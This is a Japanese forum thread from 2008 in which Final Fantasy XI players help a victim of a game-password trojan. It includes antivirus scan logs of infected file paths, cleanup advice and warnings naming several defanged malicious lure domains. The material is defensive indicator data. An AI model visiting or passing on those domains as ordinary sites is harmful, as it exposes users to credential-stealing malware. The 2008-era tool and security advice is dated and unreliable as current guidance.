E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067628.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067790.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067872.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068007.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068071.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068284.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068370.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ

86 :既にその名前は使われています:2008/03/24(月) 07:23:29.42 ID:rCHR+RwE
続きです

E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP585\A0068454.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069244.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069282.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069295.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069311.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069323.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069332.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069333.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069345.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069346.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ

87 :既にその名前は使われています:2008/03/24(月) 07:25:18.69 ID:rCHR+RwE
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr スキップ
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ

これで一応全部オンラインスキャンが終わりました。
1つづつ探して何か別の場所に保存して
http://www.mcafee.com/japan/security/contactavert.aspへ送れば良いんでしょうか?

88 :80:2008/03/24(月) 07:30:20.21 ID:QCo+vR7/
>>84
私の場合、URLの//(ダブルスラッシュ)直後とブログIDが一緒なのですが
他の方は違うor変更することもできるのでしょうか。

間違っていた事を書き込んでしまっていたら申し訳ありません。
スルーしてください(´・ω・`)

89 :既にその名前は使われています:2008/03/24(月) 07:48:39.60 ID:vtt50urT
>>87
>>87 のだけでいいよ。他は復元の領域(触れない)や
IEのキャッシュ(一時ファイル消せば消える)で重複してる。
McAfee使ってるなら送り先はそこのメールで。
WebImmuneには俺アップしてるんだけど、どうも放置されてる。

90 :既にその名前は使われています:2008/03/24(月) 07:51:12.33 ID:vtt50urT
>>88
FC2IDはメールアドレスだったと思う。
管理画面の「ようこそ○○さん」とは関係ない。

91 :既にその名前は使われています:2008/03/24(月) 07:54:00.87 ID:MKZHUFJz
>>88
詳しく書かないがブログIDとログインIDは別物。
知らないってことはブラウザにIDとパス記憶させてる?危険だよそれ。
ハックされたブログもクッキー使ってたか知りたいな。


92 :既にその名前は使われています:2008/03/24(月) 07:54:55.32 ID:rCHR+RwE
>>89
わかりました、探してまずは圧縮してみます<(_ _)>

93 :80:2008/03/24(月) 08:06:40.96 ID:QCo+vR7/
>>90>>91
確認してきましたが、ログインIDは記憶させていました。
そのせいだったんですねorz

>>84さん、失礼致しました。

94 :既にその名前は使われています:2008/03/24(月) 08:08:45.04 ID:rCHR+RwE
あと気になったファイルがあったので載せておきますね。
オンラインスキャンの結果をメールで報告するトコがありますよね?
出てきたファイルが↓です。

kavonline0.vir
kavonline1.vir
kavonline2.vir
kavonline3.vir
kavonline4.vir
kavonline5.vir
kavonline6.vir

どこにあったのかまではわかりませんでした。

95 :既にその名前は使われています:2008/03/24(月) 08:09:36.93 ID:wiMjf6Lx
Mac用のPG2みたいなソフトないですか…

96 :既にその名前は使われています:2008/03/24(月) 08:15:42.99 ID:vc86vULj
>>88の言いたい事が何となく分かる。
ブログ取得するのに確かにFC2IDが必要で、それは登録したメルアドなんだけど
ブログ取得する際にブログIDが発行されて、それはブログのアドレスに組み込まれてる
 ttp://ブログID.blog××.fc2.com/
こんな感じに。

で、プラグインのリンクを使ってると、リンクの一番下に管理者ページの入り口があって
そこで求められるのは、FC2IDかブログID、どっちでも良いんだ。パスワードは両者共通。
分かりにくかったら、適当なFC2のブログから管理者ページに飛んで見てもらいたい
このへんがFC2が狙われる理由なんじゃないかと思っている。

…見当違いの事言ってたら済みません。

97 :既にその名前は使われています:2008/03/24(月) 08:36:21.56 ID:HWQPHJQs
>>96あってるとおもうよ

98 :既にその名前は使われています:2008/03/24(月) 08:40:55.56 ID:h9kMfdX+
>>91
FC2ブログは使ってないので知らないけど、普通はIDとパス記憶させるのは
オートコンプリートの方じゃないかな

99 :既にその名前は使われています:2008/03/24(月) 08:42:27.44 ID:Q/ktx4QO
>>85
おつかれさん。仮眠して少しは落ち着いたかな?

まずは、サポセンに電話して、アカウントを丸ごと止めさせるんだ。

次に、PCをネットからケーブルごと引っこ抜け。
感染している以上、外部から完全に掌握されていると思ってくれ。

それから、ブラウザの履歴見て、PCの動作ががつんと重くなったと
感じたあたりを思い出してみて。
ポイント的には、なんちゃら.jp以外のところ。

そして、ワームの検体の提出を考えるのは最後にすること。
なぜなら、既に検出できてるわけだから、カスペルスキーは対応できてる。
どれを検体とするかは、リストから拾っとくよ。

100 :98:2008/03/24(月) 08:43:24.33 ID:h9kMfdX+
普通はIDとパス記憶させるのは (クッキーじゃなくて)オートコンプリートの方じゃないかな
ってことね

オートコンプリート履歴とクッキーは別物だから、それぞれ別の手順で削除しないとダメ

101 :既にその名前は使われています:2008/03/24(月) 08:45:50.22 ID:rCHR+RwE
おはようございます<(_ _)>

>>99
上から順番に読んできましたが前スレの>>168の方と同じ症状がありましたorz
2週間前ぐらいに時計が2000年と表示されてたのを覚えています。
?と思ったんですが、気がついたときには元に戻っていたのでそのままにしておきました…
十日前にココを見ていれば防げたかもしれませんね…いまさらですがorz

サポートセンターが空くまで時間がありますので少し情報?を
攻略サイトでよく見ていたところはからくりwikiぐらいです。
それと、からくりを上げてる人のブログを2〜3箇所回りましたが覚えていませんorz
Yahooやグーグルの検索で出てきたところを見た気がします。

良く行くサイトはYouTubeとニコニコです。
その他のサイトはほとんどスレに貼られたアドレスから飛んでいました。
P2Pというとウィンニーやシェアでしょうか?
友人に勧められてインストールしましたが、設定がわからないので使った事はありません。

102 :既にその名前は使われています:2008/03/24(月) 08:48:02.79 ID:60BI5hP8
検知しました: ウイルス Net-Worm.Win32.Allaple.a ファイル: D:\etc\Rep\2007年\9月\FFXI 2007年09月27日18:43.htm

これやばい?

103 :既にその名前は使われています:2008/03/24(月) 08:53:04.68 ID:HWQPHJQs
これやばいこれやばい聞く前にウィルス名でぐぐって見ろと

104 :既にその名前は使われています:2008/03/24(月) 08:57:00.76 ID:60BI5hP8
ググったけど件数少なすぎてわからないんです・・・
誤検知なのかな?

105 :既にその名前は使われています:2008/03/24(月) 08:58:10.98 ID:cSZUGl4j
つーかヤバくないって言われたらどうすんだよw
飼ったままにしとくのか?

106 :既にその名前は使われています:2008/03/24(月) 08:59:38.43 ID:60BI5hP8
誤検知なんだったら処理しない?を選ぼうかと・・

107 :既にその名前は使われています:2008/03/24(月) 09:02:28.57 ID:rCHR+RwE
>>99
忘れてましたorz夜はありがとうございました<(_ _)>
いまは大分落ち着いています。ホント頭が真っ白になりました。

2ちゃんねるのみなさんには色々お手数をかけてしまって、本当にありがとうございます!
今、体験版をダウンロードしてインストールしてます。

追加報告ですが、公式サイトのPOL会員情報にはログインできるようになりました。
ゲームのほうは試してませんが、ログインはちょっと様子を見たほうが良いですか?

108 :既にその名前は使われています:2008/03/24(月) 09:05:33.12 ID:HWQPHJQs
>>102
ttp://www.f-secure.co.jp/v-descs/v-descs3/allaple-a.htm

109 :既にその名前は使われています:2008/03/24(月) 09:07:23.92 ID:HWQPHJQs
おっと途中で送信
Allaple.aでぐぐって15300件も出てきました
どうやってぐぐったんだ?w

110 :既にその名前は使われています:2008/03/24(月) 09:13:32.82 ID:Q/ktx4QO
>>95
ttp://phoenixlabs.org/pgosx/

111 :既にその名前は使われています:2008/03/24(月) 09:14:18.71 ID:60BI5hP8
net-Worm.Win32.Allaple.a
でぐぐってました

112 :既にその名前は使われています:2008/03/24(月) 09:14:51.88 ID:RKvWaEx6
危険といわれているブログには行った覚えがないものの
一連の騒ぎで不安になり、一応カスペルスキーでスキャンしてみたらこんなのが出てきました。

C:\Documents and Settings\Application Data\Symantec\Norton AntiVirus\Quarantine\294E6D1E.jpg 感染: Trojan.VBS.IFrame

しかしノートンでスキャンしてもなんの反応もないし、そもそもノートンのプログラムの一部に思えるのですが
これはなんらかの対策をしたほうがいいんでしょうか?

113 :80:2008/03/24(月) 09:15:15.72 ID:QCo+vR7/
まさに>>96さんの言うようにログインしていました。

キャッシュやオートコンプリートなど全て削除してみましたが
ここからならブログIDでログインできてしまうんですね。

うちはマイナーブログですがこのままFC2を使い続けるのは不安が残ります…。
やはりブログは閉鎖して、しばらく様子を見ようと思います。

114 :既にその名前は使われています:2008/03/24(月) 09:15:35.01 ID:QuC4Hos4
>>112
ちょっと上のレスぐらい見ろ

115 :既にその名前は使われています:2008/03/24(月) 09:20:08.13 ID:rpE40Jdl
>>107
おはようございます。PCはクリーンになるまでそれでインしない方がいいと思います
このスレでも、2度ハックされたって方もいましたし。
PG2はhttp://miku.a.orn.jp/miku6/index.htmlでわかりやすく説明してくれてるので、
よかったら参考に。上のアドレス踏むの怖かったら、アグサで調べてからとかでも><

116 :既にその名前は使われています:2008/03/24(月) 09:23:57.04 ID:lzZx8A86
>>102
ファイル名だけ見る限りは、誤検知かもしれないけど、
駆除しておいたほうがいいんじゃない?

117 :既にその名前は使われています:2008/03/24(月) 09:27:13.76 ID:Q/ktx4QO
>>107
「公式サイト」が何を意味するか分からないが、
PlayOnLineにログインできたってことかな?

で、PlayOnLineにログインできたのなら、
ログインできた日時とID/pwをメモしておいて。
まずは、PCの面倒よりも自分のアカウントの状況を
□eに認識してもらうのを最優先しすべく、
>>7-9の準備しておこう。

繰り返すが、PCは常時接続にせず、必要最小限のときに接続すること。
PCを落としておくということでもかまわん。

118 :既にその名前は使われています:2008/03/24(月) 09:28:41.97 ID:rCHR+RwE
>>115
わかりました。しばらく様子を見てみます<(_ _)>ありがとうございます!
サイトのほうも見て来ました。簡単なようですので入れられるようなら入れてみます。

関係ないですが、このカスペルキーの検知した時の音が怖いですorz

119 :既にその名前は使われています:2008/03/24(月) 09:30:24.35 ID:HZjEcLif
いやちょっと待て
垢ハックされて昨日の夜はログインできなくて今日出来るっておかしくね?
サポセンまだ開いてないぞ

ただのパスワード入力ミスじゃ…

120 :既にその名前は使われています:2008/03/24(月) 09:31:10.08 ID:rCHR+RwE
>>117
FF11の公式サイトにある、POL会員サポートのところにログインできました。
今からもう一度行ってみて、回線を切っておきます<(_ _)>
ありがとうございます!

121 :既にその名前は使われています:2008/03/24(月) 09:33:59.95 ID:Q/ktx4QO
>>112
ttp://www.mcafee.com/japan/security/virD2003.asp?v=DoS-iFrameNet
これ読んでどうすればいいか分かれ。

122 :既にその名前は使われています:2008/03/24(月) 09:35:56.39 ID:lzZx8A86
>>119
それか、業者がパスを元に戻したとかかね

123 :既にその名前は使われています:2008/03/24(月) 09:36:11.19 ID:rCHR+RwE
これが落ち着くまでの最後の書き込みです。
>>119
会員情報で自分が操作した履歴を見れるんですが
機能私が変更したのは一回だけですが↓のような結果が…orz

サービス利用履歴の確認 > プレイオンライン
年月日 サービス名 アクション
2008/03/24 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/03 プレイオンライン
POLパスワード 変更

124 :既にその名前は使われています:2008/03/24(月) 09:37:09.52 ID:rpE40Jdl
ううん、何でPOL入れたのかな。バハスレで新しいレジコメールに送ったってあったから、それ使ったのかな?
プレイ中に落とされたって書いてたから、パスワード入力ミスって事はないんじゃないかな

125 :既にその名前は使われています:2008/03/24(月) 09:37:42.70 ID:rpE40Jdl
ごめん、かぶったorz

126 :既にその名前は使われています:2008/03/24(月) 09:39:22.55 ID:h5QlJmlh
>>119
ログインしてる最中に後から同じIDでログインされると先にログインしてる方は落とされるんだよ。
ID、パスの間違いじゃない。
その後、ログイン合戦があってパス変更されてしまい、ログイン出来なくなったらしい。

127 :既にその名前は使われています:2008/03/24(月) 09:39:27.24 ID:Q/ktx4QO
>>119
それなら、ヴァナのことは放って、PCの始末に専念できるってことさ。
今は、アカウントの保持だよ。

感染してる=ハックされてると仮定してたが、PCが感染により重くて
POLとの通信が切れたこともあり得るね。

>>120
>>119の可能性もあるので、前回落とされた時間とさっきログインできた時間を
サポセンに連絡して、その間のログインがあったかの調査を頼んでおきなはれ。

128 :既にその名前は使われています:2008/03/24(月) 09:40:01.67 ID:CHzqP0my
>>123
これは怖い

129 :既にその名前は使われています:2008/03/24(月) 09:42:22.93 ID:wiMjf6Lx
>>110
ありがとうございます、恩にきます

130 :既にその名前は使われています:2008/03/24(月) 09:43:46.33 ID:rpE40Jdl
なんでこんなに書き換えられて?本人が書き換えたのが今日ではまだないですよね?
業者側が何度もかえてたんだろうけど・・・どうしてだろう?

131 :既にその名前は使われています:2008/03/24(月) 09:46:36.60 ID:Q/ktx4QO
>>123
よく気が回ったね。いい情報拾った。
2回目以降の状況がどう見ても異常だというのが読み取れる。
それぞれのパスワード変更のときの接続元IPが違うだろうから、
それも申し入れておくといい。

で、業者側が痕跡を残さないように元に戻したとも考えられるか。
# アイテムがなくなってるか、変なところにいるはずなのでバレバレだがね。
ま、この辺は業者しか分からない訳なので、こういう例があると記憶しておこうや。

132 :既にその名前は使われています:2008/03/24(月) 09:53:17.18 ID:h9kMfdX+
>>126
その説明じゃまだイマイチ分らないんだけど、パスを変更されても変更する前の元のパスで
POLにログインできるってこと?
それはそれでPOLのセキュリティに問題ない?

133 :既にその名前は使われています:2008/03/24(月) 09:57:38.66 ID:h9kMfdX+
あぁ、ごめん勘違いしてた(´・ω・`)

134 :既にその名前は使われています:2008/03/24(月) 10:10:57.98 ID:Q/ktx4QO
>>123
3時過ぎに鯖板に晒してたメアドに昨日のIDをタイトルにしたメールしてあるからなっと。

135 :既にその名前は使われています:2008/03/24(月) 10:20:14.40 ID:xnmW2Y33
こんなスレあったんですね。
少し前にPCが重いので、@niftyの無料ウィルスチェックしたら
Trojanなんたら、種別:トロイの木馬 というのが検出できました。
ウィルスの駆除ボタンを押しても駆除失敗と出るだけなので、
強引にそのファイルごと全消去しました…。
POLは電話してパスワード変更してもらって(←今までのパスワード忘れてしまってた)、
その後何度かウィルスチェック(@niftyのとこですが…)をかけてますが
検出されてません。
でもここ見ると、カスペルスキイというのでしか検出できないみたいですね。
ウィルスが消えてるのか、それとも単に検出できないだけなのか…

136 :既にその名前は使われています:2008/03/24(月) 10:25:49.35 ID:xXZ5UG8T
個人的メモ

@niftyウイルスチェックサービス:@nifty(カスペルスキーと同じエンジンらしくてしかも駆除もしれくれるらしい)
http://www.nifty.com/security/vcheck/

Firefoxをこの際入れてしかも今まで2chブラウザを使ってなかった、bbs2chreaderというアドオンを入れてみよう

【韓国 中国】PeerGuardian 23【YBBを弾こう】
http://tmp7.2ch.net/test/read.cgi/download/1204341836/
lt;丶`∀´gt; PeerGuardian2 ★2 (`ハ´ )
http://pc11.2ch.net/test/read.cgi/sec/1129612402/




137 :既にその名前は使われています:2008/03/24(月) 10:48:24.12 ID:Q/ktx4QO
>>135
よく消せたねぇ...

138 :既にその名前は使われています:2008/03/24(月) 10:48:34.53 ID:0fYn7lrn
ログインできたのならとりあえずアイテムなくなってるかだけでも確認したほうがいいんじゃない?

139 :既にその名前は使われています:2008/03/24(月) 10:49:25.93 ID:Yz0CGQZ+
パスワード変更したならログインしないほうがいい

140 :既にその名前は使われています:2008/03/24(月) 10:58:16.75 ID:cxfdIhE2
>>112
それノートンがすでに隔離したファイルだと思うが
ノートンの使い方の中で隔離ファイルの削除を探すんだ

>>114
上のレスってどれ?
同様の質問がfc2ブログを見に行ったらスレにあったがそっちのこと?

141 :既にその名前は使われています:2008/03/24(月) 11:07:19.86 ID:/brrgtmu
>>140

114じゃないが…

FC2ブログを見に行くと垢ハックされるぞ
http://live27.2ch.net/test/read.cgi/ogame/1206155257/

コッチのスレとゴッチャになってしまったんじゃないかな?

>>112に関してのレスは下記参照

http://live27.2ch.net/test/read.cgi/ogame/1206155257/542-544

142 :既にその名前は使われています:2008/03/24(月) 11:08:29.60 ID:586YcECP
>>878
感染もなにも、「Ace Password Sniffer」はオンライン販売されているソフト
フリーのパケットキャプチャソフトにパスワード抜き出しツールを被せたもの
シマンテックはこれを「好ましからざるソフト」に分類した
カスペルスキーがWinnyやShareを「好ましからざるソフト」扱いするのと同じ

みんなが説明してくれているように、リピータハブを使っていてかつ業者と
同居していなければPS2やXBOXがやり取りするデータがPCに流れることはないよ
たとえ流れても、専用の解読ツールでも作らない限りパスは抜けない


前スレの886からするとPS2なら安全ということなの?
ハブみてみたらリピーターだったんだが家には業者らしき人間はいない。

143 :既にその名前は使われています:2008/03/24(月) 11:11:17.81 ID:QdOH9ZPy
>>36
ブログ主が小遣い稼ぎで中華広告を埋めたという線もあるからな

144 :まとめ”管理”人 ◆mj63/8nmCU :2008/03/24(月) 11:14:25.55 ID:6zivGh2w
過去ログの方のまとめ管理人です。コテワード忘れてしまったので変わります。すみません本人です。
今現在の過去ログは950〜以降が取りきれてないものが若干ありますがup完了しています。

>>79さんありがとうございます。ログ補完できました。

被害抜粋も再開していきますのでお待ち下さい。

あとサイトにも書きましたがinfoseekのメルアドが送受信不具合を起こしています。(知人からのメールで発覚)
今現在届いてるメールには返信は終わってますが返事がない方は

matome★ort.sakura.ne.jp
(ほしを@にかえてください)

お手数ですがこちらに再送よろしくおねがいします。

145 :ログまとめ ◆mj63/8nmCU :2008/03/24(月) 11:29:52.41 ID:6zivGh2w
うわ・・・名前に管理と入れると自動に””が付くんですね。
他の管理の方と紛らわしいので変えました。スレ汚しすみません

146 :既にその名前は使われています:2008/03/24(月) 11:46:43.59 ID:E6d3p/DA
Lirisです。先ほどサポートセンターへ連絡してきました。
ログインの履歴から、私が寝た後にログインされていて、不正アクセスの可能性が高いという事です。
一度、サポートセンターからもらったパスワードでPOLとFF11へログインしキャラクターの状態を確認。
なくなってるアイテムもなく、お金もそのままでした。

おそらく私が書き込んだあとにGMを呼んで下さった方々のおかげだと思います。
倉庫の方も無事を確認しました。キャラクターの移動もなく、ホントそのままの状態です。
ログアウトしたあと、また新しいパスワードをもらいましたので、
パソコンの方が綺麗になってからログインしようかと思います。

サポートセンターの方からウィルスの情報がありましたら教えてください、という事で
・重要な領域
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj
を報告して来ました。

147 :既にその名前は使われています:2008/03/24(月) 11:48:27.80 ID:E6d3p/DA
実際に被害(キャラ・アイテム等)にないと言うことですが、
不正にアクセスされたという結果は犯罪なので、
警察の生活安全課に、ご自身の判断で通報・被害届けを出してください、とのことです。

ここでたくさんの応援と助言をありがとうございました<(_ _)>
たぶん、みなさんがいなければ泣き寝入りしていたかもしれません。
私のような結果は、もしかすると稀なのかもしれませんが、
キャラクターがいなくなったり、アイテムがなくなったりする人が実際にいるんですよね…
こういう被害者が出ないように祈っています。

私だけではどうしようも出来なかった事だと思っていますので感謝しきれません。
本当にありがとうございました!<(_ _)>

148 :既にその名前は使われています:2008/03/24(月) 11:55:41.59 ID:lsU5BPJR
>>146
被害が無くて本当に良かった。
でもハックしてログインしておきながらギルに手をつけないってなんなんだろう?
あえて取るほどでもない金額とかだと被害に合わないのかな?
参考までに所持金額が知りたいです。失礼な質問でごめん(´・ω・`)

149 :既にその名前は使われています:2008/03/24(月) 11:57:33.35 ID:E6d3p/DA
>>148
所持金ですか…orz
恥ずかしいですが、メインで4万ギルちょっとです(;´д⊂)
倉庫には忍術の束しか入れてませんでした。

150 :既にその名前は使われています:2008/03/24(月) 12:00:06.03 ID:37tZuH3A
そこまでやられてると、必要なユーザーデータをバックアップ後
初期化ー>パッチ適応ー>再インストールしたほうがいいかも

ブックマークとか忘れがちだけどね
年賀状ソフトのデータとかも忘れて入れなおしたなぁ〜今年

151 :既にその名前は使われています:2008/03/24(月) 12:06:10.84 ID:V0clbcIb
>>149
キャラだけチェックして、優先順位的に下位のほうにされたということかなぁ。
何はともあれお疲れさんでした。

152 :既にその名前は使われています:2008/03/24(月) 12:09:42.70 ID:xXZ5UG8T
>>146
乙です
今後の人のためにその検出したアンチウィルスソフトも報告されたほうがいいですよね。
ブツは同じでもアンチウィルスソフトのメーカーによって名前が変わる事も稀によくあることですし。

153 :既にその名前は使われています:2008/03/24(月) 12:12:04.46 ID:lsU5BPJR
確かにこれだけパス抜かれてる人が多いと、
業者も売り捌きやらなんやらで忙しいんだろうな…。

>>149
4万かー。参考になったよ。ありがとう(`・ω・´)

154 :既にその名前は使われています:2008/03/24(月) 12:17:08.53 ID:2iutMXe5
素人なもんで教えてください
ブログが危ないのはわかったが、ELEMENとかは大丈夫なんだろか
(o・v・o)?


155 :既にその名前は使われています:2008/03/24(月) 12:17:20.29 ID:E6d3p/DA
>>151
そうなのかもしれませんね…
あとは素早くたくさんの人が対処してくださった結果のだと思います。

>>152
カスペルスキー オンラインスキャナ レポート
2008年3月24日 1:20:33
OS: Microsoft Windows XP Home Edition, Service Pack 2 (Build 2600)
カスペルスキー オンラインスキャナ バージョン: 5.0.98.0
データベースの最終アップデート: 23/03/2008
データベースのレコード: 655233

↑これがスキャンした時のです。
今は体験版で削除をしてますが、>>150さんの助言どおり終わったら再インストールするつもりです。

やっと安心できますorzホント気が気じゃなかったです。
みなさんのレスがなかったら一人で悶々としてるしかなかったですよ…
何かありましたらまた報告しますね。
お礼ばっかり言ってる気がしますが、言わせてください<(_ _)>
色々とありがとうございました!

156 :既にその名前は使われています:2008/03/24(月) 12:21:35.09 ID:5JqdShUs
再インストール後はWindowsUpdateを忘れずに

http://windowsupdate.microsoft.com/

157 :既にその名前は使われています:2008/03/24(月) 12:29:12.48 ID:KjMFND3D
>>146          おつかれさまでした。キャラ無事でなによりです。


少しGMの対応かわった?前の報告だとウィルス名とか聞いてたっけ?

158 :既にその名前は使われています:2008/03/24(月) 12:34:14.42 ID:DC8kpJkf
新たに福建中華の罠ドメインが登録されていたので気をつけてくれよな!
ブログ改竄騒ぎよろしく早ければすでに使われているはず。

Domain name: gamelaone■com
longyan Fujian 364000
Created: 2008-03-22

159 :既にその名前は使われています:2008/03/24(月) 12:36:47.46 ID:cSZUGl4j
ガメレオン涙目じゃね?

160 :既にその名前は使われています:2008/03/24(月) 12:39:21.34 ID:rwIEyNv5
フォルダ構成理解してない奴ばっかだな
こんなバカだらけだと垢ハックは減らないわ

161 :既にその名前は使われています:2008/03/24(月) 12:39:47.32 ID:vQXYTLxz
パッケ買ってせこせこと複数PC上でツール使いながら活動するよか楽に金が稼げる
手段としてやってるんだろね。



162 :既にその名前は使われています:2008/03/24(月) 12:42:05.87 ID:DZlVuT/f
>>146じゃないけど、二、三日前にハックにあって何も被害無し。対応の仕方も同じ。ウィルスが原因。

俺の場合、inしてる時に他からログインされて、相手とログイン合戦になった結果パス変えられてって感じ。
手持ちの他垢からGMに伝えたけど電話じゃなきゃ無理だった。

知らない誰かと自キャラでログイン合戦してる恐怖感はトラウマだわ。 長文チラ裏スマソ

163 :既にその名前は使われています:2008/03/24(月) 12:42:30.25 ID:cSZUGl4j
単発で急に切れる奴何なの?w

164 :既にその名前は使われています:2008/03/24(月) 12:42:51.55 ID:sV5MTkg6
とにかく■は公式の目立つところに垢ハクの注意勧告を載せるべきだな。
ネ実で対策が進んでるのに、まったくあきれるほど保身を優先する会社だぜ。

問題を認めると、問い合わせやら責任問題やらの対応に手がかかると思ってんだろうな。
■が無視してるそのあいだにも被害は拡大しているというのに。


165 :既にその名前は使われています:2008/03/24(月) 12:43:21.80 ID:CpNX2ymN
ところで、オートログインのネットゲームって一般的な存在なんだろうか?

166 :既にその名前は使われています:2008/03/24(月) 12:46:49.68 ID:xXZ5UG8T
>>155
俺らにもだけど、そのサポートセンターさんにということでした。
紛らわしくてソマン

167 :既にその名前は使われています:2008/03/24(月) 12:53:18.90 ID:O+2gK/uP
ペコログ踏んじまった。
avastとSpybot無反応だ。。
カスペ落としてスキャンせねば><

168 :既にその名前は使われています:2008/03/24(月) 12:58:43.37 ID:Q/ktx4QO
>>146
ヴァナ無事確認おめでとう! 本当によかった。

>>149
いわゆる高額保有者ではなく、異次元価格品もなかったので、
業者も困ったってとこかw
君はわしか?w

で、>>150のいうとおりだと思う。
何かしら住んでる可能性あるし、バックドア1度開けられて、IP拾われてるだろうから
業者さんからアタック掛けられる可能性も残る。
ので、ウィルス対策単体ではなく、一式面倒を見てくれるソフトを入れておくのを
お勧めする。
鍵は多重に掛けるでしょ?

>>156
最近は、MicrosoftUpdateがよいよ〜。
MS-Officeのも引っかけてくれるから。

169 :既にその名前は使われています:2008/03/24(月) 13:03:27.16 ID:NX6Uk0kR
>>167
まだペコログにトロイ残ってるのかな?

170 :既にその名前は使われています:2008/03/24(月) 13:05:26.80 ID:O+2gK/uP
>>169
もう大丈夫なのかな><
カスペの無料体験ルーレットが90日引けなくてリトライ祭してたところ。。

171 :既にその名前は使われています:2008/03/24(月) 13:10:26.54 ID:NX6Uk0kR
>>170
前スレで警告されてたけど、
ぺころぐにトロイがあるってこちらが聞いたのは
金曜日の話なんだよね。
FC2ブログは今回の話見てから一切開いてないけど
金曜日から見てる人は注意したほうが良いかもしれない。
今も治ってるかどうかもわからないし。
また情報が入ったら書き込みします。

172 :既にその名前は使われています:2008/03/24(月) 13:11:05.57 ID:13N6BdxD
スクエニはいつまで静観してるつもりだろうな…
被害が一気に増えたりでもしら悪い意味で有名になるだろうに…

173 :既にその名前は使われています:2008/03/24(月) 13:13:25.17 ID:zZKH+Aj5
つうかマンガ喫茶とかつかうほうがアホなんだろ
自宅だけにして、LSコミュニティも利用しないほうがいい


174 :既にその名前は使われています:2008/03/24(月) 13:21:38.03 ID:HWQPHJQs
>>154
お前のかおもじが気に入らない

175 :既にその名前は使われています:2008/03/24(月) 13:23:13.70 ID:Q/ktx4QO
>>170
こんなのもあるぜ? 左側に30日体験のバナーがある。
ttp://www.mcafee.com/japan/mcafee/home/

176 :既にその名前は使われています:2008/03/24(月) 13:49:30.88 ID:vtt50urT
dda3■net、hellh■netに続くfccja■comのトロイのスキャン。
各社への検体提出から23時間経過。
Kasperskyに続きAntiVirも撃墜するようになったものの、そこから変化なし。
ttp://www.virustotal.com/analisis/ae4b34f1f08f6dd6d93f3574b1fe6f04

177 :既にその名前は使われています:2008/03/24(月) 13:51:50.72 ID:47bjLYLG
ペコろぐソース見てきたけど、自分で見た限りでは変なスクリプトはなかった感じ。
3/22に管理人様の書き込み記事で対処済みとあるのと、今現在は大丈夫そう。

